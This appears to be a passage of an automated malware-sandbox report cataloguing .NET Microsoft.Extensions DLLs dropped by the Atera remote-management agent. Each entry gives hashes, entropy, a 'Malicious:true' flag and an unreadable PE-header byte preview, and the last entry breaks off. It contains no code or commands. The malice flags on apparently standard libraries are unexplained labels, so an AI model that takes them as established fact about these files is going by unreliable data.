                                                                                                                                                                                                                                                                                              SHA1:E0F04DA639F8DBC83E1F818BE3512B8B32825181
                                                                                                                                                                                                                                                                                              SHA-256:32083D1E8B347DADA45BF2E986CD8873A55926863ABFA78AB286BB57F418136B
                                                                                                                                                                                                                                                                                              SHA-512:116B960C4CA7A1D596004036EC60837D3C74687CCF3D13772DEB9C0A3F48A91A66196372BE013B66EECBDA32C852FA1D5E7183BB2C34DB48BCE764D40A6D2BE9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..@..........~^... ...`....... ...............................P....`.................................+^..O....`..T............N..P(...........]..T............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...T....`.......B..............@..@.reloc...............L..............@..B................_^......H.......p*..8/...........Y.......\......................................*.-..(....*..s....z..( ...,..-..s....z.r...ps!...z.*.~....*..0..........(....,..*..(.....o"......&...*...................0...........(.......(#...-..,..*.*.(....,.r/..p......%...%...($...*..(%...*.(....,.r/..p......%...%...%...($...*...(&...*.(....,!r/..p......%...%...%...%...($...*....('...*..,&(....,..r/..pr/..p.($...((...*..()...*.*.(....,.r/..p......%...%...($...*...(*...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Diagnostics.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):35408
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.489255735196851
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:1CuDYWVpNJY2b12pRMoYDQFRK8EDdFUg4ThTqbO4UyBoPHQss9gCWP/kW2Nyb8Ec:1CuMWVBZb1alK3/uT6BmagzoEpYi60M
                                                                                                                                                                                                                                                                                              MD5:FBDF079FDFE1D5AB83A77C605675ABC4
                                                                                                                                                                                                                                                                                              SHA1:F6B7C33CF4B312F2F6EFD187B3647490672BE541
                                                                                                                                                                                                                                                                                              SHA-256:9FD96218556419229560DCB960FF0D6E771D2144C1F7F047301ABDF534F1EBEE
                                                                                                                                                                                                                                                                                              SHA-512:AE1FFE60E877B52FBF204876F60310F2E465DED57254A7EB37B4CBE1B8EEE52A493B20D1D9012EBB8CB73A086583765AA1098CCB08610B917907D4B8073F919C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3............" ..0..X...........v... ........... ..............................'v....`.................................yv..O....................b..P(...........u..T............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............`..............@..B.................v......H........6..<;..........Hq.......u......................................*.-..(....*..s....z..(....,..-..s....z.r...ps ...z.*.~....*..0..........(....,..*..(.....o!......&...*...................0...........(.......("...-..,..*.*.(....,.r/..p......%...%...(#...*..($...*.(....,.r/..p......%...%...%...(#...*...(%...*.(....,!r/..p......%...%...%...%...(#...*....(&...*..,&(....,..r/..pr/..p.(#...('...*..((...*.*.(....,.r/..p......%...%...(#...*...()...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22096
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.6166303658453405
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:LgH8Tv2So+MVV1CMHWs/hW2Nyb8E9VF6IYijSJIVx2iBvJ:LgcTvlGFtVEpYi60RJ
                                                                                                                                                                                                                                                                                              MD5:00671AFD77C0B92B94EBF7ED1FE1733F
                                                                                                                                                                                                                                                                                              SHA1:3B9B94063A438C5B8B867A4C5EDB15213C944050
                                                                                                                                                                                                                                                                                              SHA-256:78B082BA22BBD5D9DE7360AC96B8792E91EA1698520DEF5AC50598E5A4B203A5
                                                                                                                                                                                                                                                                                              SHA-512:CE458E3B9A92EB8F28B922370124F92F2498F486C59969B26A96C665B9ED92F6A26412BA499B3BE5534CD0AC06D710BDB79A3FF26801F4D269E1124847E5981A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Pm..........." ..0.."..........JA... ...`....... ....................................`..................................@..O....`..................P(...........?..T............................................ ............... ..H............text...P!... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............,..............@..B................+A......H.......T#.............. <..@...`?.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....( ...*..(!...*.*.(....,.r...p......%...%...(....*...("...*.(....,.r...p......%...%...%...(....*....(#...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44624
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.4383472343149935
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:d0uMdRozKWWyAWxcnuHeHopdtU6LCxZF+4EpYi6034x:dPMSeWWyZcnuHeIpdtUxZF+B76J
                                                                                                                                                                                                                                                                                              MD5:ADAAB325F94C1A45753773E670DB286B
                                                                                                                                                                                                                                                                                              SHA1:BD771EF76221B98CBB0DD9EC5DE8603A4743E85F
                                                                                                                                                                                                                                                                                              SHA-256:7815D5505EB66DD0058F36D52CCA09E38607D88E75EB3A8382209E7822B31CB7
                                                                                                                                                                                                                                                                                              SHA-512:AD1B2A5D8A15A22FBBD97ABFA6BD41DEB41873B450EDA9FE3E639AE6DFE0FAC77214E2B5372D2F72954368528BAF732D828FD43B7B8DEB798DFF5AED8B3E0B02
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@f............" ..0..|............... ........... ....................................`.................................W...O.......p...............P(..........H...T............................................ ............... ..H............text....z... ...|.................. ..`.rsrc...p............~..............@..@.reloc..............................@..B........................H.......P;...V..........`...h..........................................*.-..(....*..s&...z..('...,..-..s&...z.r...ps(...z.*.~....*..0..........(....,..*..(.....o)......&...*.............. ....0...........(.......(*...-..,..*.*.(....,.r/..p......%...%...(+...*..(,...*.(....,.r/..p......%...%...%...(+...*...(-...*.(....,!r/..p......%...%...%...%...(+...*....(....*..,&(....,..r/..pr/..p.(+...(/...*..(0...*.*.(....,.r/..p......%...%...(+...*...(1...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45648
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.380504630294902
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:80PO7gRE3x5o7UP04wqgYtqPRw02KO7I9Yfwbhgv5NuEpYi60KpHUdwi:802GE3xOwP04wqgYtm2nQY4Ngv5NP76W
                                                                                                                                                                                                                                                                                              MD5:F7D4ED4D032AAB5069962F97ABB53DAB
                                                                                                                                                                                                                                                                                              SHA1:5077B272686598FFA93F107B7E699163102253B6
                                                                                                                                                                                                                                                                                              SHA-256:76507D71E543E2E9548BCC8609839010180F0D747200882D17D6B3435702B099
                                                                                                                                                                                                                                                                                              SHA-512:9A32F85A780CF92EB49A180E3E9247E2D9956FCD05902F79BD4E0CDE24F9A52364801D4ACC9AEEB2EDC68433871CCA11682288E9F132F31E5C87D510DB126743
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o$..........." ..0.................. ........... ...................................`.................................g...O.......H...............P(..........`...T............................................ ............... ..H............text....~... ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H.......DD..TS..............H...........................................*.-..(....*..s(...z..()...,..-..s(...z.r...ps*...z.*.~....*..0..........(....,..*..(.....o+......&...*...................0...........(.......(,...-..,..*.*.(....,.r/..p......%...%...(-...*..(....*.(....,.r/..p......%...%...%...(-...*...(/...*.(....,!r/..p......%...%...%...%...(-...*....(0...*..,&(....,..r/..pr/..p.(-...(1...*..(2...*.*.(....,.r/..p......%...%...(-...*...(3...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.Abstractions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51280
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.922122342098677
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:y1xwFY6xnU7GjPb6vXCMVOm4e+X9CzJ67Mo7tKoV2nwsyQYvZt164yCmi3FbTojS:5FJnU7GjPb6vxWFvTbTojN76zr
                                                                                                                                                                                                                                                                                              MD5:E5BF8DEF8B6FA71A58C26F97B5B8ABA6
                                                                                                                                                                                                                                                                                              SHA1:039CB79945384B4C301917DEE16488988592C035
                                                                                                                                                                                                                                                                                              SHA-256:7D34292ACC8DD95A0B1F5016A0E5C60F4975EA8E4AC85D1293D4E1225A9F5AF4
                                                                                                                                                                                                                                                                                              SHA-512:5F4978472F1AA0496C3533B52E716081AE04F01D0D4215CA29ED219C81388888C3BE79A1C28761DDC7BD714B7A03A0D3D81DC94BE3BA0723C7EA945C3E8522ED
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:..........." ..0.............".... ........... ..............................y.....`....................................O.......8...............P(.............T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H.......P/..................H...D.......................................*.-..(....*..s"...z..(#...,..-..s"...z.r...ps$...z.*.~m...*..0..........(....,..*..(.....o%......&...*...................0...........(.......(&...-..,..*.*.(....,.r/..p......%...%...('...*..((...*.(....,.r/..p......%...%...%...('...*...()...*.(....,!r/..p......%...%...%...%...('...*....(*...*..,&(....,..r/..pr/..p.('...(+...*..(,...*.*.(....,.r/..p......%...%...('...*...(-...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):72272
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.282810814332541
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:NxU6xUrlXPSW8rCe2FNUY4epmkOHjkmb8pR4x4bb4kb3Ec5qt+vEpYi60S:Nxfx+lXPSWgC19p3ibv6bbac5qt+I76T
                                                                                                                                                                                                                                                                                              MD5:F70770682F5B9B9748F0C1CA913AF810
                                                                                                                                                                                                                                                                                              SHA1:1CC25A4CC7ED6E6A392F48F3A30DF356CB1B2215
                                                                                                                                                                                                                                                                                              SHA-256:1D82B03D8251EB2EADD0B04A166388EDAFBC4B07698248E416E54487EBB6529C
                                                                                                                                                                                                                                                                                              SHA-512:F25E06F8576E714AD75A318D2626EBF66DDB09A012DE5F3D79190721C73FA155B420DAC9BED39987EA955B139D6C5C424491BAAD60AAFDE316E0BC80A7474890
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.s..........." ..0.............f.... ... ....... .......................`.......I....`.....................................O.... ..................P(...@...... ...T............................................ ............... ..H............text...l.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................E.......H.......,_.............................................................*.-..(....*..s(...z..()...,..-..s(...z.r...ps*...z.*.~....*..0..........(....,..*..(.....o+......&...*...................0...........(.......(,...-..,..*.*.(....,.r/..p......%...%...(-...*..(....*.(....,.r/..p......%...%...%...(-...*...(/...*.(....,!r/..p......%...%...%...%...(-...*....(0...*..,&(....,..r/..pr/..p.(-...(1...*..(2...*.*.(....,.r/..p......%...%...(-...*...(3...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):88656
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.179212783172685
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:OOTqBUaumtB8dThJyB8Hy1Uf1p33YpyEflX6YZH265djWtI76Z:OOb9dThRH7P33YpyEfgYZH2YxCIO
                                                                                                                                                                                                                                                                                              MD5:530AEB724465732AD881A5D3C318B63C
                                                                                                                                                                                                                                                                                              SHA1:566AB48A4A2058E3E4DB1181C6E90B54985F2CCC
                                                                                                                                                                                                                                                                                              SHA-256:05BB5FD82CDBBF83F7D62D5C782284069A3ECCA1B6681337BBA3D591BE2A9429
                                                                                                                                                                                                                                                                                              SHA-512:7901A46BA21EB058EAE53B0F961B8AA1D51FDE1987907569145A60D4F4EEA9FDCD4A15AB1D1D2883E166402162BADAFA16B7655A2608477126E04BAD6376711E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..../..........." ..0..$...........B... ...`....... ..............................1o....`..................................A..O....`.. ............2..P(...........@..T............................................ ............... ..H............text...."... ...$.................. ..`.rsrc... ....`.......&..............@..@.reloc...............0..............@..B.................A......H.......\p..............d:......D@......................................*.-..(....*..s+...z..(,...,..-..s+...z.r...ps-...z.*.~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(/...-..,..*.*.(....,.r/..p......%...%...(0...*..(1...*.(....,.r/..p......%...%...%...(0...*...(2...*.(....,!r/..p......%...%...%...%...(0...*....(3...*..,&(....,..r/..pr/..p.(0...(4...*..(5...*.*.(....,.r/..p......%...%...(0...*...(6...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Abstractions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):65104
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.299652052426314
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Lz7ouSrbVozuvi53ReiJd/zk6cuAJU/JJeUuvBtkJJQiH2hsm+Y+EpYi60T:cuoVozugRhTeU+AQ5+Y/76q
                                                                                                                                                                                                                                                                                              MD5:DDA21E837A8171653A9081CC35E010BB
                                                                                                                                                                                                                                                                                              SHA1:47BFE2E3A9979ABB760C1DD3E7BA7118514006FB
                                                                                                                                                                                                                                                                                              SHA-256:5CE21236DF625CC73DD1208A5839EC7CA73DFDDF62C3F2F37276A3D00D6B05E5
                                                                                                                                                                                                                                                                                              SHA-512:823F8E8A155C99AC68F501816A7BCF7080BC5DD02DAABD1E8681F811A74FA29F80A520E24EC8C22D82C677A7085659F55ED953A0D91758BD5A25F6CE64FBE127
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~............." ..0.................. ........... .......................@...........`.................................G...O.......................P(... ......<...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................{.......H........Q..`...........................................................*.-..(....*..s1...z..(2...,..-..s1...z.r...ps3...z.*.~....*..0..........(....,..*..(.....o4......&...*..............!....0...........(.......(5...-..,..*.*.(....,.r/..p......%...%...(6...*..(7...*.(....,.r/..p......%...%...%...(6...*...(8...*.(....,!r/..p......%...%...%...%...(6...*....(9...*..,&(....,..r/..pr/..p.(6...(:...*..(;...*.*.(....,.r/..p......%...%...(6...*...(<...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.560591663533643
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:vZiKrZyGBZGMjK4fCYOgmpIb6mioBkcJWxsdU7RWLNyb8E9VF6IYijSJIVxEXS47:vZiKrZ7HGMjvJbPrddU7MEpYi60W7
                                                                                                                                                                                                                                                                                              MD5:AD3C1E7A20E8219CC37595A3BA3AD8DD
                                                                                                                                                                                                                                                                                              SHA1:7099800D6B38B7BECAF4B1BF4FE6591B9217D936
                                                                                                                                                                                                                                                                                              SHA-256:687C14EB326DFD8AA51AF86DF9DD7264AC8E3153E8A9DAF991E3C5AFB299934C
                                                                                                                                                                                                                                                                                              SHA-512:EDC2BE57407C79D5EF3FE97A70A3B7EEC50E8FE195DF3CEF320098FEA831A8174FF78EC0ED219B5A302D9F90079FEBEB09317F1DED1250F5D602F8850373ABD8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..:...........Y... ...`....... ....................................`..................................X..O....`..L............D..P(...........W..T............................................ ............... ..H............text....9... ...:.................. ..`.rsrc...L....`.......<..............@..@.reloc...............B..............@..B.................X......H.......`'...,...........S..H...,W......................................*.-..(....*..s!...z..("...,..-..s!...z.r...ps#...z.*.~....*..0..........(....,..*..(.....o$......&...*...................0...........(.......(%...-..,..*.*.(....,.r/..p......%...%...(&...*..('...*.(....,.r/..p......%...%...%...(&...*...((...*.(....,!r/..p......%...%...%...%...(&...*....()...*..,&(....,..r/..pr/..p.(&...(*...*..(+...*.*.(....,.r/..p......%...%...(&...*...(,...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):71248
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.29461718507247
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Ewj0b9108ypuuQwfi+uYTql2csO55555+VZJ4MMv0nrtrGvAo92hTHxsk5hIuT2E:Ek052O2cs14UJGyhTRthBojRVx76H
                                                                                                                                                                                                                                                                                              MD5:5EC29323EA151FCF4B8BB4E09DD19245
                                                                                                                                                                                                                                                                                              SHA1:E324CB5D1FDAD3FA17A3785CC6D6CE3CC8E941F3
                                                                                                                                                                                                                                                                                              SHA-256:299E9AB6BAA96327A7E4E3632B04D7BDF8E053A5B2D5C5575D43071831F05D55
                                                                                                                                                                                                                                                                                              SHA-512:3EE005A641098A1D00C3BDBCFE0FF81568E074F6CEAC375F50D4A5A5D49740781AC3BAD623139214FB15FC8A04247C9D7EE913AFD7BF388D7F9D2DF4A09AB61B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1..........." ..0.................. ... ....... .......................`.......a....`.................................A...O.... ..L...............P(...@......@...T............................................ ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B................u.......H........Z.............H...x...........................................*.-..(....*..s6...z..(7...,..-..s6...z.r...ps8...z.*.0..l.........~..........(9...*(:........,.r/..p(;.......+.rA..p(;.....,..r...p(<...-..r...p.o=...+..+....(>...........*&........*.~....*....0..........(....,..*..(.....o?......&...*..............&....0...........(.......(<...-..,..*.*.(....,.r...p......%...%...(@...*..(A...*.(....,.r...p......%...%...%...(@...*...(B...*.(....,!r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Debug.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20048
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.686759028752427
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:HVFDkHCuH8PLmMYWJlVMWiNyb8E9VF6IYijSJIVxLA+geXEd:1NWC1Tx3sEpYi60kDo4
                                                                                                                                                                                                                                                                                              MD5:AFF9D54E76BFEF81D971C6E471A7FE17
                                                                                                                                                                                                                                                                                              SHA1:CDA61EC51B8C1358D1300F3D8E15F64D2E903432
                                                                                                                                                                                                                                                                                              SHA-256:2D2A51981EB98FF8C3DCD4DDAB66E94FA2145FBAD7767A12D56838DB86D10A3B
                                                                                                                                                                                                                                                                                              SHA-512:07C3C0AF72CE311247475F0C8CCC79C07F2847710DAC150A11AD84E4F4B775937F29D054213B6A7BFEDB25ACB2EA685363076813AA410A42EB0337EB19FA063F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....U..........." ..0..............9... ...@....... ....................................`.................................]9..O....@..(............&..P(...`......`8..T............................................ ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`.......$..............@..B.................9......H........!.......................7......................................*.-..(....*..s....z..(....,..-..s....z.r...ps ...z.*..(....*..(....*6.s....o!....*J.o"...(...+($....*..(%...*.~....*.*.(....*.s.........*.~....*..(%...*.*.s.........*:.(%.....}....*.(....*F(&...,........*.*...0............(....-.*..r/..p(.........o'.....((...,.*....()......(...+..rC..p(+......(,.....(-......,..(....(......%-.&.+.o/...(0......{....(....*"..(1...*..s....*.*..(%...*..BSJB............v4.0.303

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25680
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.608998813453675
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:LK39j3aWjszWA3JdOBBgCV7Vwn7CW2fFWCNyb8E9VF6IYijSJIVxUSXByD:L29AWAXEB6U9EpYi60e
                                                                                                                                                                                                                                                                                              MD5:159A8C5F235B9EF411FCDA805606644F
                                                                                                                                                                                                                                                                                              SHA1:FDF4B18DE07928A58022F28A8AA6EA8643E1BE70
                                                                                                                                                                                                                                                                                              SHA-256:ABF694DF314CBD07403EBCB86BEA8EF8DF644E4BF63FA3241C12B8837DF381D7
                                                                                                                                                                                                                                                                                              SHA-512:D81DA0042293BD7B21CB8100A14B1F9EA03498F6F7F698AEB0A0A229CC0ECDB318B1C16EE83A50E37BE8E0C2000B577E9CE30C5DF0D4CD7282F62A7010C11044
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K8..........." ..0..2...........Q... ...`....... ..............................w.....`..................................P..O....`..`............<..P(...........O..T............................................ ............... ..H............text....1... ...2.................. ..`.rsrc...`....`.......4..............@..@.reloc...............:..............@..B.................P......H........'...'..................8O......................................*.-..(....*..s!...z..("...,..-..s!...z.r...ps#...z.*..r/..p(.....r?..p(......s....o$....*....0..+.......s5......}.....s+...%...6...s%...o'...(....*"..(....*v.rQ..p(.....o&...(...+((....*..rQ..p(.....r?..p(.....o&....s....(...+((....*..ra..p(.....(....&.o&....(...+&.*..(+...*.~....*.*.(....*.s.........*.~....*..(+...*.*.s.........*.0..x........(+....ru..p(.....r?..p(......}......}......}......o(...}......(

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):34384
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.56721620598541
                                                                                                                                                                                                                                                                                              Encrypted:false
